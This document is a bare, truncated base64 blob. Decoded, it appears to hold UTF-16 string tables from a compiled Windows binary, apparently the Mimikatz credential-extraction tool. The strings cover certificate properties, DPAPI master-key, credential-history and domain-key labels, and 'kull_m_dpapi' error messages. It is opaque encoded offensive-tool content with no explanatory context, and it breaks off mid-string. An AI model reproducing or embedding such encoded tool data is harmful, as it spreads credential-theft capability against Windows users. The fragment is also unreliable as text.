QAXwBIAEEAUwBIAF8AUABSAE8AUABfAEkARAAAAEMARQBSAFQAXwBLAEUAWQBfAEMATwBOAFQARQBYAFQAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8ASwBFAFkAXwBTAFAARQBDAF8AUABSAE8AUABfAEkARAAAAEMARQBSAFQAXwBJAEUAMwAwAF8AUgBFAFMARQBSAFYARQBEAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAFAAVQBCAEsARQBZAF8ASABBAFMASABfAFIARQBTAEUAUgBWAEUARABfAFAAUgBPAFAAXwBJAEQAAABDAEUAUgBUAF8ARQBOAEgASwBFAFkAXwBVAFMAQQBHAEUAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAEMAVABMAF8AVQBTAEEARwBFAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAE4ARQBYAFQAXwBVAFAARABBAFQARQBfAEwATwBDAEEAVABJAE8ATgBfAFAAUgBPAFAAXwBJAEQAAABDAEUAUgBUAF8ARgBSAEkARQBOAEQATABZAF8ATgBBAE0ARQBfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBQAFYASwBfAEYASQBMAEUAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAEQARQBTAEMAUgBJAFAAVABJAE8ATgBfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBBAEMAQwBFAFMAUwBfAFMAVABBAFQARQBfAFAAUgBPAFAAXwBJAEQAAABDAEUAUgBUAF8AUwBJAEcATgBBAFQAVQBSAEUAXwBIAEEAUwBIAF8AUABSAE8AUABfAEkARAAAAEMARQBSAFQAXwBTAE0AQQBSAFQAXwBDAEEAUgBEAF8ARABBAFQAQQBfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBFAEYAUwBfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBGAE8AUgBUAEUAWgBaAEEAXwBEAEEAVABBAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAEEAUgBDAEgASQBWAEUARABfAFAAUgBPAFAAXwBJAEQAAABDAEUAUgBUAF8ASwBFAFkAXwBJAEQARQBOAFQASQBGAEkARQBSAF8AUABSAE8AUABfAEkARAAAAEMARQBSAFQAXwBBAFUAVABPAF8ARQBOAFIATwBMAEwAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8AUABVAEIASwBFAFkAXwBBAEwARwBfAFAAQQBSAEEAXwBQAFIATwBQAF8ASQBEAAAAAAAAAAAAQwBFAFIAVABfAEMAUgBPAFMAUwBfAEMARQBSAFQAXwBEAEkAUwBUAF8AUABPAEkATgBUAFMAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAEkAUwBTAFUARQBSAF8AUABVAEIATABJAEMAXwBLAEUAWQBfAE0ARAA1AF8ASABBAFMASABfAFAAUgBPAFAAXwBJAEQAAABDAEUAUgBUAF8AUwBVAEIASgBFAEMAVABfAFAAVQBCAEwASQBDAF8ASwBFAFkAXwBNAEQANQBfAEgAQQBTAEgAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8ARQBOAFIATwBMAEwATQBFAE4AVABfAFAAUgBPAFAAXwBJAEQAAABDAEUAUgBUAF8ARABBAFQARQBfAFMAVABBAE0AUABfAFAAUgBPAFAAXwBJAEQAAAAAAAAAQwBFAFIAVABfAEkAUwBTAFUARQBSAF8AUwBFAFIASQBBAEwAXwBOAFUATQBCAEUAUgBfAE0ARAA1AF8ASABBAFMASABfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBTAFUAQgBKAEUAQwBUAF8ATgBBAE0ARQBfAE0ARAA1AF8ASABBAFMASABfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBFAFgAVABFAE4ARABFAEQAXwBFAFIAUgBPAFIAXwBJAE4ARgBPAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAGMAZQByAHQAXwBmAGkAbABlAF8AZQBsAGUAbQBlAG4AdAAAAAAAQwBFAFIAVABfAGMAcgBsAF8AZgBpAGwAZQBfAGUAbABlAG0AZQBuAHQAAABDAEUAUgBUAF8AYwB0AGwAXwBmAGkAbABlAF8AZQBsAGUAbQBlAG4AdAAAAEMARQBSAFQAXwBrAGUAeQBpAGQAXwBmAGkAbABlAF8AZQBsAGUAbQBlAG4AdAAAAEMARQBSAFQAXwBSAEUATgBFAFcAQQBMAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAEEAUgBDAEgASQBWAEUARABfAEsARQBZAF8ASABBAFMASABfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBBAFUAVABPAF8ARQBOAFIATwBMAEwAXwBSAEUAVABSAFkAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8AQQBJAEEAXwBVAFIATABfAFIARQBUAFIASQBFAFYARQBEAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAEEAVQBUAEgATwBSAEkAVABZAF8ASQBOAEYATwBfAEEAQwBDAEUAUwBTAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAEIAQQBDAEsARQBEAF8AVQBQAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAE8AQwBTAFAAXwBSAEUAUwBQAE8ATgBTAEUAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8AUgBFAFEAVQBFAFMAVABfAE8AUgBJAEcASQBOAEEAVABPAFIAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAFMATwBVAFIAQwBFAF8ATABPAEMAQQBUAEkATwBOAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAFMATwBVAFIAQwBFAF8AVQBSAEwAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAE4ARQBXAF8ASwBFAFkAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8ATwBDAFMAUABfAEMAQQBDAEgARQBfAFAAUgBFAEYASQBYAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAFMATQBBAFIAVABfAEMAQQBSAEQAXwBSAE8ATwBUAF8ASQBOAEYATwBfAFAAUgBPAFAAXwBJAEQAAAAAAAAAQwBFAFIAVABfAE4ATwBfAEEAVQBUAE8AXwBFAFgAUABJAFIARQBfAEMASABFAEMASwBfAFAAUgBPAFAAXwBJAEQAAABDAEUAUgBUAF8ATgBDAFIAWQBQAFQAXwBLAEUAWQBfAEgAQQBOAEQATABFAF8AUABSAE8AUABfAEkARAAAAAAAAAAAAEMARQBSAFQAXwBIAEMAUgBZAFAAVABQAFIATwBWAF8ATwBSAF8ATgBDAFIAWQBQAFQAXwBLAEUAWQBfAEgAQQBOAEQATABFAF8AUABSAE8AUABfAEkARAAAAAAAAAAAAEMARQBSAFQAXwBTAFUAQgBKAEUAQwBUAF8ASQBOAEYATwBfAEEAQwBDAEUAUwBTAF8AUABSAE8AUABfAEkARAAAAAAAAAAAAEMARQBSAFQAXwBDAEEAXwBPAEMAUwBQAF8AQQBVAFQASABPAFIASQBUAFkAXwBJAE4ARgBPAF8AQQBDAEMARQBTAFMAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8AQwBBAF8ARABJAFMAQQBCAEwARQBfAEMAUgBMAF8AUABSAE8AUABfAEkARAAAAEMARQBSAFQAXwBSAE8ATwBUAF8AUABSAE8ARwBSAEEATQBfAEMARQBSAFQAXwBQAE8ATABJAEMASQBFAFMAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAFIATwBPAFQAXwBQAFIATwBHAFIAQQBNAF8ATgBBAE0ARQBfAEMATwBOAFMAVABSAEEASQBOAFQAUwBfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBTAFUAQgBKAEUAQwBUAF8ATwBDAFMAUABfAEEAVQBUAEgATwBSAEkAVABZAF8ASQBOAEYATwBfAEEAQwBDAEUAUwBTAF8AUABSAE8AUABfAEkARAAAAEMARQBSAFQAXwBTAFUAQgBKAEUAQwBUAF8ARABJAFMAQQBCAEwARQBfAEMAUgBMAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAEMARQBQAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAG8AcgBpAGcAaQBuAGEAbABfAEMARQBQAF8AUABSAE8AUABfAEkARAAAAEMARQBSAFQAXwBTAEkARwBOAF8ASABBAFMASABfAEMATgBHAF8AQQBMAEcAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8AUwBDAEEAUgBEAF8AUABJAE4AXwBJAEQAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAFMAQwBBAFIARABfAFAASQBOAF8ASQBOAEYATwBfAFAAUgBPAFAAXwBJAEQAAABDAEUAUgBUAF8AUwBVAEIASgBFAEMAVABfAFAAVQBCAF8ASwBFAFkAXwBCAEkAVABfAEwARQBOAEcAVABIAF8AUABSAE8AUABfAEkARAAAAEMARQBSAFQAXwBQAFUAQgBfAEsARQBZAF8AQwBOAEcAXwBBAEwARwBfAEIASQBUAF8ATABFAE4ARwBUAEgAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAEkAUwBTAFUARQBSAF8AUABVAEIAXwBLAEUAWQBfAEIASQBUAF8ATABFAE4ARwBUAEgAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8ASQBTAFMAVQBFAFIAXwBDAEgAQQBJAE4AXwBTAEkARwBOAF8ASABBAFMASABfAEMATgBHAF8AQQBMAEcAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAEkAUwBTAFUARQBSAF8AQwBIAEEASQBOAF8AUABVAEIAXwBLAEUAWQBfAEMATgBHAF8AQQBMAEcAXwBCAEkAVABfAEwARQBOAEcAVABIAF8AUABSAE8AUABfAEkARAAAAAAAAAAAAEMARQBSAFQAXwBOAE8AXwBFAFgAUABJAFIARQBfAE4ATwBUAEkARgBJAEMAQQBUAEkATwBOAF8AUABSAE8AUABfAEkARAAAAEMARQBSAFQAXwBBAFUAVABIAF8AUgBPAE8AVABfAFMASABBADIANQA2AF8ASABBAFMASABfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBOAEMAUgBZAFAAVABfAEsARQBZAF8ASABBAE4ARABMAEUAXwBUAFIAQQBOAFMARgBFAFIAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAEgAQwBSAFkAUABUAFAAUgBPAFYAXwBUAFIAQQBOAFMARgBFAFIAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8AUwBNAEEAUgBUAF8AQwBBAFIARABfAFIARQBBAEQARQBSAF8AUABSAE8AUABfAEkARAAAAAAAAAAAAEMARQBSAFQAXwBTAEUATgBEAF8AQQBTAF8AVABSAFUAUwBUAEUARABfAEkAUwBTAFUARQBSAF8AUABSAE8AUABfAEkARAAAAEMARQBSAFQAXwBLAEUAWQBfAFIARQBQAEEASQBSAF8AQQBUAFQARQBNAFAAVABFAEQAXwBQAFIATwBQAF8ASQBEAAAAAAAAAEMARQBSAFQAXwBEAEkAUwBBAEwATABPAFcARQBEAF8ARgBJAEwARQBUAEkATQBFAF8AUABSAE8AUABfAEkARAAAAAAAAAAAAEMARQBSAFQAXwBSAE8ATwBUAF8AUABSAE8ARwBSAEEATQBfAEMASABBAEkATgBfAFAATwBMAEkAQwBJAEUAUwBfAFAAUgBPAFAAXwBJAEQAAAAAAAAAAABDAEUAUgBUAF8AUwBNAEEAUgBUAF8AQwBBAFIARABfAFIARQBBAEQARQBSAF8ATgBPAE4AXwBSAEUATQBPAFYAQQBCAEwARQBfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBTAEgAQQAyADUANgBfAEgAQQBTAEgAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8AUwBDAEUAUABfAFMARQBSAFYARQBSAF8AQwBFAFIAVABTAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAFMAQwBFAFAAXwBSAEEAXwBTAEkARwBOAEEAVABVAFIARQBfAEMARQBSAFQAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAFMAQwBFAFAAXwBSAEEAXwBFAE4AQwBSAFkAUABUAEkATwBOAF8AQwBFAFIAVABfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBTAEMARQBQAF8AQwBBAF8AQwBFAFIAVABfAFAAUgBPAFAAXwBJAEQAAABDAEUAUgBUAF8AUwBDAEUAUABfAFMASQBHAE4ARQBSAF8AQwBFAFIAVABfAFAAUgBPAFAAXwBJAEQAAABDAEUAUgBUAF8AUwBDAEUAUABfAE4ATwBOAEMARQBfAFAAUgBPAFAAXwBJAEQAAAAAAAAAQwBFAFIAVABfAFMAQwBFAFAAXwBFAE4AQwBSAFkAUABUAF8ASABBAFMASABfAEMATgBHAF8AQQBMAEcAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8AUwBDAEUAUABfAEYATABBAEcAUwBfAFAAUgBPAFAAXwBJAEQAAABQAFIATwBWAF8AYwBuAGcAAAAAAEEAVABfAEsARQBZAEUAWABDAEgAQQBOAEcARQAAAAAAQQBUAF8AUwBJAEcATgBBAFQAVQBSAEUAAAAAAEMATgBHACAASwBlAHkAAABDAEUAUgBUAF8AdQBuAGsAXwBmAHUAdAB1AHIAZQBfAHUAcwBlAAAAQwBFAFIAVABfAHUAbgBrAF8ANgAzAF8AbQBhAHkAYgBlAF8AZgB1AHQAdQByAGUAXwB1AHMAZQAAAAAAQwBFAFIAVABfAHIAZQBzAGUAcgB2AGUAZABfAHAAcgBvAHAAXwBpAGQAAABDAEUAUgBUAF8AdQBzAGUAcgBfAHAAcgBvAHAAXwBpAGQAAAAlACoAcwAqACoAQgBMAE8AQgAqACoACgAAAAAAJQAqAHMAIAAgAGQAdwBWAGUAcgBzAGkAbwBuACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAACUAKgBzACAAIABnAHUAaQBkAFAAcgBvAHYAaQBkAGUAcgAgACAAIAAgACAAIAAgADoAIAAAAAAAAAAAACUAKgBzACAAIABkAHcATQBhAHMAdABlAHIASwBlAHkAVgBlAHIAcwBpAG8AbgAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAlACoAcwAgACAAZwB1AGkAZABNAGEAcwB0AGUAcgBLAGUAeQAgACAAIAAgACAAIAA6ACAAAAAAAAAAAAAlACoAcwAgACAAZAB3AEYAbABhAGcAcwAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUAIAAoAAAAKQAKAAAAAAAAAAAAJQAqAHMAIAAgAGQAdwBEAGUAcwBjAHIAaQBwAHQAaQBvAG4ATABlAG4AIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAACUAKgBzACAAIABzAHoARABlAHMAYwByAGkAcAB0AGkAbwBuACAAIAAgACAAIAAgADoAIAAlAHMACgAAACUAKgBzACAAIABhAGwAZwBDAHIAeQBwAHQAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAgACgAJQBzACkACgAAAAAAAAAlACoAcwAgACAAZAB3AEEAbABnAEMAcgB5AHAAdABMAGUAbgAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAAACUAKgBzACAAIABkAHcAUwBhAGwAdABMAGUAbgAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAlACoAcwAgACAAcABiAFMAYQBsAHQAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAAAAAAAAAAAAlACoAcwAgACAAZAB3AEgAbQBhAGMASwBlAHkATABlAG4AIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAJQAqAHMAIAAgAHAAYgBIAG0AYQBjAGsASwBlAHkAIAAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAAAAAAJQAqAHMAIAAgAGEAbABnAEgAYQBzAGgAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1ACAAKAAlAHMAKQAKAAAAAAAAACUAKgBzACAAIABkAHcAQQBsAGcASABhAHMAaABMAGUAbgAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAAJQAqAHMAIAAgAGQAdwBIAG0AYQBjADIASwBlAHkATABlAG4AIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAACUAKgBzACAAIABwAGIASABtAGEAYwBrADIASwBlAHkAIAAgACAAIAAgACAAIAAgADoAIAAAAAAAAAAAACUAKgBzACAAIABkAHcARABhAHQAYQBMAGUAbgAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAlACoAcwAgACAAcABiAEQAYQB0AGEAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAAAAAAAAAAAAlACoAcwAgACAAZAB3AFMAaQBnAG4ATABlAG4AIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAJQAqAHMAIAAgAHAAYgBTAGkAZwBuACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAKAAoAAAAAACUAKgBzACoAKgBNAEEAUwBUAEUAUgBLAEUAWQAqACoACgAAACUAKgBzACAAIABkAHcAVgBlAHIAcwBpAG8AbgAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAACUAKgBzACAAIABzAGEAbAB0ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAAAAAAJQAqAHMAIAAgAHIAbwB1AG4AZABzACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAJQAqAHMAIAAgAGEAbABnAEgAYQBzAGgAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUAIAAoACUAcwApAAoAAAAlACoAcwAgACAAYQBsAGcAQwByAHkAcAB0ACAAIAAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAgACgAJQBzACkACgAAACUAKgBzACAAIABwAGIASwBlAHkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAlACoAcwAqACoAQwBSAEUARABIAEkAUwBUACAASQBOAEYATwAqACoACgAAACUAKgBzACAAIABnAHUAaQBkACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAlACoAcwAqACoARABPAE0AQQBJAE4ASwBFAFkAKgAqAAoAAAAlACoAcwAgACAAZAB3AFMAZQBjAHIAZQB0AEwAZQBuACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAlACoAcwAgACAAZAB3AEEAYwBjAGUAcwBzAGMAaABlAGMAawBMAGUAbgAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAlACoAcwAgACAAZwB1AGkAZABNAGEAcwB0AGUAcgBLAGUAeQAgACAAIAAgADoAIAAAAAAAJQAqAHMAIAAgAHAAYgBTAGUAYwByAGUAdAAgACAAIAAgACAAIAAgACAAIAA6ACAAAAAAACUAKgBzACAAIABwAGIAQQBjAGMAZQBzAHMAYwBoAGUAYwBrACAAIAAgACAAOgAgAAAAAAAlACoAcwAqACoATQBBAFMAVABFAFIASwBFAFkAUwAqACoACgAAAAAAAAAAACUAKgBzACAAIABzAHoARwB1AGkAZAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAB7ACUALgAzADYAcwB9AAoAAAAAACUAKgBzACAAIABkAHcARgBsAGEAZwBzACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAAJQAqAHMAIAAgAGQAdwBNAGEAcwB0AGUAcgBLAGUAeQBMAGUAbgAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAAAAAAAAlACoAcwAgACAAZAB3AEIAYQBjAGsAdQBwAEsAZQB5AEwAZQBuACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAAACUAKgBzACAAIABkAHcAQwByAGUAZABIAGkAcwB0AEwAZQBuACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAAJQAqAHMAIAAgAGQAdwBEAG8AbQBhAGkAbgBLAGUAeQBMAGUAbgAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAACUAKgBzAFsAbQBhAHMAdABlAHIAawBlAHkAXQAKAAAAJQAqAHMAWwBiAGEAYwBrAHUAcABrAGUAeQBdAAoAAAAlACoAcwBbAGMAcgBlAGQAaABpAHMAdABdAAoAAAAAACUAKgBzAFsAZABvAG0AYQBpAG4AawBlAHkAXQAKAAAAJQAqAHMAKgAqAEMAUgBFAEQASABJAFMAVAAqACoACgAAAAAAJQAqAHMAIAAgAGQAdwBWAGUAcgBzAGkAbwBuACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAlACoAcwAgACAAZwB1AGkAZAAgACAAIAAgACAAIAA6ACAAAAAlACoAcwAgACAAZAB3AE4AZQB4AHQATABlAG4AIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAACUAKgBzACoAKgBDAFIARQBEAEgASQBTAFQAIABFAE4AVABSAFkAKgAqAAoAAAAAACUAKgBzACAAIABkAHcAVAB5AHAAZQAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAACUAKgBzACAAIABhAGwAZwBIAGEAcwBoACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAgACgAJQBzACkACgAAAAAAJQAqAHMAIAAgAHIAbwB1AG4AZABzACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAlACoAcwAgACAAcwBpAGQATABlAG4AIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAlACoAcwAgACAAYQBsAGcAQwByAHkAcAB0ACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUAIAAoACUAcwApAAoAAAAAACUAKgBzACAAIABzAGgAYQAxAEwAZQBuACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAJQAqAHMAIAAgAG0AZAA0AEwAZQBuACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAlACoAcwAgACAAUwBhAGwAdAAgACAAIAAgACAAIAA6ACAAAAAlACoAcwAgACAAUwBpAGQAIAAgACAAIAAgACAAIAA6ACAAAAAlACoAcwAgACAAcABTAGUAYwByAGUAdAAgACAAIAA6ACAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAGQAcABhAHAAaQBfAHUAbgBwAHIAbwB0AGUAYwB0AF8AYgBsAG8AYgAgADsAIABDAHIAeQBwAHQARABlAGMAcgB5AHAAdAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAGQAcABhAHAAaQBfAHUAbgBwAHIAbwB0AGUAYwB0AF8AYgBsAG8AYgAgADsAIABrAHUAbABsAF8AbQBfAGMAcgB5AHAAdABvAF8AYwBsAG8AcwBlAF8AaABwAHIAbwB2AF8AZABlAGwAZQB0AGUAXwBjAG8AbgB0AGEAaQBuAGUAcgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBkAHAAYQBwAGkAXwB1AG4AcAByAG8AdABlAGMAdABfAGIAbABvAGIAIAA7ACAAawB1AGwAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGgAawBlAHkAXwBzAGUAcwBzAGkAbwBuACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAGQAcABhAHAAaQBfAHUAbgBwAHIAbwB0AGUAYwB0AF8AbQBhAHMAdABlAHIAawBlAHkAXwB3AGkAdABoAF8AcwBoAGEARABlAHIAaQB2AGUAZABrAGUAeQAgADsAIABrAHUAbABsAF8AbQBfAGMAcgB5AHAAdABvAF8AYwBsAG8AcwBlAF8AaABwAHIAbwB2AF8AZABlAGwAZQB0AGUAXwBjAG8AbgB0AGEAaQBuAGUAcgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBkAHAAYQBwAGkAXwB1AG4AcAByAG8AdABlAGMAdABfAG0AYQBzAHQAZQByAGsAZQB5AF8AdwBpAHQAaABfAHMAaABhAEQAZQByAGkAdgBlAGQAawBlAHkAIAA7ACAAawB1AGwAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGgAawBlAHkAXwBzAGUAcwBzAGkAbwBuACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAGQAcABhAHAAaQBfAHUAbgBwAHIAbwB0AGUAYwB0AF8AZABvAG0AYQBpAG4AawBlAHkAXwB3AGkAdABoAF8AawBlAHkAIAA7ACAAQwByAHkAcAB0AEQAZQBjAHIAeQBwAHQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AZABwAGEAcABpAF8AdQBuAHAAcgBvAHQAZQBjAHQAXwBkAG8AbQBhAGkAbgBrAGUAeQBfAHcAaQB0AGgAXwBrAGUAeQAgADsAIABDAHIAeQBwAHQAUwBlAHQASwBlAHkAUABhAHIAYQBtACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAGQAcABhAHAAaQBfAHUAbgBwAHIAbwB0AGUAYwB0AF8AZABvAG0AYQBpAG4AawBlAHkAXwB3AGkAdABoAF8AawBlAHkAIAA7ACAAawB1AGwAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGMAbABvAHMAZQBfAGgAcAByAG8AdgBfAGQAZQBsAGUAdABlAF8AYwBvAG4AdABhAGkAbgBlAHIAIAAoADAAeAAlADAAOAB4ACkACgAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBkAHAAYQBwAGkAXwB1AG4AcAByAG8AdABlAGMAdABfAGMAcgBlAGQAaABpAHMAdABfAGUAbgB0AHIAeQBfAHcAaQB0AGgAXwBzAGgAYQBEAGUAcgBpAHYAZQBkAGsAZQB5ACAAOwAgAGsAdQBsAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBjAGwAbwBzAGUAXwBoAHAAcgBvAHYAXwBkAGUAbABlAHQAZQBfAGMAbwBuAHQAYQBpAG4AZQByACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBkAHAAYQBwAGkAXwB1AG4AcAByAG8AdABlAGMAdABfAGMAcgBlAGQAaABpAHMAdABfAGUAbgB0AHIAeQBfAHcAaQB0AGgAXwBzAGgAYQBEAGUAcgBpAHYAZQBkAGsAZQB5ACAAOwAgAGsAdQBsAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBoAGsAZQB5AF8AcwBlAHMAcwBpAG8AbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAbwBuAF8AdQBuAHAAcgBvAHQAZQBjAHQAAAAAAG8AbgBfAHAAcgBvAHQAZQBjAHQAAAAAAHIAZQBzAGUAcgB2AGUAZAAAAAAAcwB0AHIAbwBuAGcAAAAAAHIAZQBxAHUAaQByAGUAXwBzAHQAcgBvAG4AZwAAAAAAJQBzACAAOwAgAAAAdQBpAF8AZgBvAHIAYgBpAGQAZABlAG4AAAAAAHUAbgBrAG4AbwB3AG4AAABjAHIAZQBkAF8AcwB5AG4AYwAAAGEAdQBkAGkAdAAAAG4AbwBfAHIAZQBjAG8AdgBlAHIAeQAAAHYAZQByAGkAZgB5AF8AcAByAG8AdABlAGMAdABpAG8AbgAAAGMAcgBlAGQAXwByAGUAZwBlAG4AZQByAGEAdABlAAAAcwB5AHMAdABlAG0AAAAAAHAAcgBvAG0AcAB0AF8AbwBuAF8AdQBuAHAAcgBvAHQAZQBjAHQAAABwAHIAbwBtAHAAdABfAG8AbgBfAHAAcgBvAHQAZQBjAHQAAABwAHIAbwBtAHAAdABfAHMAdAByAG8AbgBnAAAACgA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0ACgBCAGEAcwBlADYANAAgAG8AZgAgAGYAaQBsAGUAIAA6ACAAJQBzAAoAPQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AAoAAAAlAGMAAAAAAD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQAKAAAAJQAqAHMARABpAHIAZQBjAHQAbwByAHkAIAAnACUAcwAnAAAAIAAoACUAcwApAAAAXAAAACoAAAAuAAAALgAuAAAAAAAlACoAcwAlADMAdQAgACUAYwB8ACcAJQBzACcACgAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBpAG8AYwB0AGwAXwBoAGEAbgBkAGwAZ